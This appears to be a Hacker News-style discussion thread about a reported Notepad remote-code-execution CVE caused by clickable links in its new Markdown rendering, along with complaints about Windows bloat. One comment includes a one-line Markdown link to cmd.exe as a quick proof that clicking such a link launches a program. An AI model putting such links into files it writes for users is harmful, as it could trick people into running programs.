If I ever hop onto an older machine I'll use the gpt to see what I get, i recall there's vbscript, apparently a .net compiler+runtime, and I saw a js interpreter in very old OS too.
A big inspiration in this realm is FogBugz historical "Wasabi". Their idea of compiling to PHP and c# i think it was, because it's what most OS come with, and their corpo clients can use it as it. It's in a joel spolsky blog post somewhere.
Btw, nano is only 50/50 chance that's it's pre-installed. Learn some vim, will ya? ;)
Edit: Fedora has it available as "msedit". What a time to be alive.
What's your day job? Are you self employed?
I'd agree that recent features feel a bit unnecessary, but it does need to edit and write files - including system ones (going through however that is authorised). You could sandbox a lot of apps with limited impact, but it would make a text editor really useless. Least privilege principles work best when you don't need many privileges.
I didn't even know Notepad would render Markdown.
Notepad handily strips away all the custom link namings and formats that totally fuck the expected output of a simple copy and paste. That's a big part of the its magic: it's immunity to the choices of marketing teams and dud management.
And it's hard to believe now, but yes, support for Ctrl+S to save file was a notable feature because notepad itself didn't support that back then.
The year of the Linux desktop doesn't need to arrive - it just needs Windows to keep shipping.
After they added copilot I finally gave up and uninstalled it and switched to a one of the minimalistic clones of the good old notepad.exe
It didn't always take a long time to load, but often enough that it was noticeable and 'worrisome' for the future of Windows.
It reminds me of King of the Hill where Hank says "Can't you see you're not making Christianity better and you're only making rock music worse?"
And decided to jump in on some threads just as well.
As usual with modern Claudes and GPT-5s, the output repeats and overemphasizes jargon from the input tokens without clarifying or switching up the wording.
From https://msrc.microsoft.com/update-guide/vulnerability/CVE-20... (there are many collapsible elements on this page, and they're also just for term definitions, sigh)
What a fucking terrible page for someone unfamiliar with the site. the "Learn More" links will allow you to learn what the terms "CWE", "CVSS", "Product Status" mean, but not to learn more about this vulnerability...
Anyway, it's not related to CoPilot, but because Notepad makes links clickable now...
True, not related to CoPilot, but if I understand your conclusion right (which I'm not sure about), it's not _just_ that links are clickable now, it's because Notepad actually does something with the links. Otherwise it'd be a browser vulnerability, and Notepad couldn't seriously be blamed.
The actual RCE here would be in some other application that registers a URL handler. Java used to ship one that was literally designed to run arbitrary code.
I was there last year myself. Decades of “eh, it’s not that bad” to “nope no, no fuck this”.
You can also put a shortcut to a program on your desktop and - horror of horrors! - clicking the shortcut will execute the program! How crazy is that?
I get that some people don't want the markdown functionality in notepad (you can turn it off very easily, btw). But I don't understand why suddenly the idea of hyperlinks is being blasted as a terrible security vulnerability?
Surely there has to be more to this, in order to generate so much hubbub, than just people not understanding the basic concept of hyperlinks?
To be fair, over the years there have been sincere efforts to re-architect the OS with a security, privacy, reliability for peristent storage, graphics, multi-tasking, multi-user, networking etc. But those efforts never caught up with the speed at which bloat was added.
At the heart, its design still has remnants that have the naivety of a stand-alone, stateless microcomputer that boots straight off a floppy after BIOS POST.
ftype txtfile=c:\windows\NOTEPAD.EXE %1Edit: going with EmEditor; forgot that existed
Is it just a well informed guess or do people decompile these programs?
The moment Microsoft started adding crap to Notepad, we knew that it was only a matter of time before such a vulnerability cropped up.
but I do wish they had called it something else and kept notepad as txt only.
They spent the last few years entirely compromising their products rather than improving them.
They're all bundled with AI features (I absolutely don't need) and never in my life will I buy a mac for coding. My current laptop is HODL'ing and idk if this enshittification will end soon.
I am moving off onto an old desktop running Debian stable slowly as I don't really need a laptop. This also isolates me from a number of geopolitical and technology creep and lock-in related risks I have identified.
I'm currently running Ubuntu on this ancient thing (which I love actually), but I absolutely don't want Windows.
2. It costs an arm and a leg to replace parts on a Mac when you travel outside the United States. Replacing the keyboard on my first macbook cost the same as the actual price. I learnt my lesson. I don't need that Apple garbage in my life.
What should I do ?
I use qemu in a docker container for many Windows related things, partially because I don't want to keep a "real" Windows system running and partially because I don't want to let that OS run outside of a VM or container.
It depends on your security mindset and goals, but I think we're far into the world of VMs and containers all the way down.
With respect to memory, try it and see. Modern Linux is very good at memory management, since it powers the entire data center world. You can certainly overcommit memory with Docker containers easily without a problem.
I wonder though if there are more open and trusted modified Windows being developed out there because trying random modified Windows in team-os is not getting me some confidence
Thankfully I don't.
if there's really nothing more to this 8.8 RCE CVE than that, this will finally be the thing that's makes me blackhole cve.org.
I saved this as test.md, opened it in notepad, clicked the link, and it popped open a command line:
[Click me](C:/Windows/System32/cmd.exe)
Can definitely go further than this; just a quick test.
To be fair, though, it's not just a click -> open/run. The user has to `ctrl+click` and will see the source of the link (at least I do).
[1] https://en.wikipedia.org/wiki/Esoteric_programming_language#...
> Windows Notepad
Disambiguation urgently needed.
Its job is to be robust, simple, and always available.
It's supposed to show you the symbols in markdown, not render them.
It is useful for opening potentially dangerous content in a 100% safe way, because "txt" should always be safe to inspect!
It is regularly used to open gigabyte-sized log files and the like, which it has to handle on machines with less free memory than that! Markdown rendering and similar features are fundamentally incompatible with this requirement because they require serialised parsing of the entire file instead of opening just tens of kilobytes at a time using memory mapping or whatever.
Notepad is also used to open files without taking a lock, allowing users to read files that are actively being written to. Again, incompatible with practically all parsing strategies.
The "new Notepad" is some dumbass executives pet project that overlaps with Visual Studio Code and is a shitty alternative to WordPad, which another dumbass executive axed for no good reason.
It's supposed to be a basic text file viewer / editor, not an alternative to WordPad or VS Code!
Not every app has to be everything for everybody.
We're in an era now where Calc.exe takes appreciable time to start and pops up HTTP web proxy authentication prompts on some networks.
It's just incredible to me the level of enshittification people just shrug off like it's nothing.
Just now, I'm trying to debug something in Visual Studio 2026. The debugger's "view list" control takes over 10 seconds to pop up a simple table of text.
Text! Tens of seconds! On a gaming/workstation PC!
Nobody at Microsoft thought this was a problem.
This should be treated as an all-out war.
The Microsoft of 2026 is insane and I have 40,000 ideas to improve things without being anticompetitive but I no longer want to work at that company for any amount of money.
Microsoft have been stagnating and letting business people steer product direction for about 30 years too long. MBAs don't know shit. Stop letting them lead product direction. Stop letting people who are not power-users of a product make decisions about that product. PERIOD. No more PMs who aren't advanced users who lived in the tool 8 hours a day for months in a previous role.
Promote people who think differently, ESPECIALLY IF THEY DO NOT FIT IN THE CULTURE AT MICROSOFT TODAY. Think about ways to innovate. Advance the computing landscape, god dammit. Why are terminals still textual? How the fuck have we not moved past this ancient paradigm? Look at Plan9 and adopt features that Plan9 pioneered, and pay zero attention to what customers will accept while doing it - you can change the shape of these features to make them palatable at a later stage of design (there's no reason these features need to be painful for anyone, but they can be--and should be--very secure and inherent, rather than opt-in.)
Just pull your flippin' head out of your ass, Microsoft. Holy shit.
To summarize, malicious Markdown files with custom schemes in URLs can trick users into executing arbitrary code. I honestly didn't know this was a "feature" of Notepad.
I guess that's my real problem here. The constant desire for feature bloat inevitably introduces potential vulnerabilities. In no world did I expect Notepad to have the ability under any circumstances to make network requests and execute arbitrary code.
Nor should I.
As an aside, this is why I violently despise Eletron apps and anything that runs its own browser engine for a GUI. I just don't want that level of attack surface in any app that I use.
[1]: https://cybersecuritynews.com/windows-notepad-rce-vulnerabil...
This isn't an AI slop problem.
The application of tools is.
There must be something much worse than slop going on to get to this point.
People don't realise how much bloat this is. The new Snipping tool for instance is 449 MEGABYTES, whereas it used to be only a few KB in size. Same with Paint, Calculator etc - all bloated UWP apps.
UWP was a mistake, they should've stuck to win32, at least for core apps.
That's a slop if you ask me. Even if it wasn't vibe coded, it now want's me to vibe use it. Who the hell wanted that.
Clicking unknown links is always a bad idea, but a CVE for that? I dunno....
Rewriting it to integrate AI and some bells and whistles recklessly and having a CVE is tragicomic if you ask me.
So yes, MS will likely denounce this as not their problem and move on.
But yeah, pedantic terminology aside, what a stupid stupid error. In notepad, of all things, reading text files should be safe. It reminds me of the WMF failure. "No you can't get a virus from playing a video" is what I would tell people. And then microsoft in their infinite wisdom said "Herp Derp, why don't we package the executable video decoder right in the video file. It will make searching for a codec a thing of the past" Sigh, smooth move microsoft, thanks for making a liar out of me.
Last month it was the term "supply chain attack" that was abused to describe a situation where some vulnerable dependency could be abused in a downstream component. I guess every weakness in the Linux kernel is now a "supply chain attack" because it was in the supply chain and there is an attack, never mind that the term was originally about e.g. the liblzma/xz situation (specific attacks on a supply chain component, with no other purpose than attacking a downstream vendor)
I know I can't stop language change but I am getting a bit tired of how many tech people (who know better) go along with fear term inflation
It'd be the same to upload a file to a web server that gets to be run by the said web server, except this time it's done with "notepad.exe"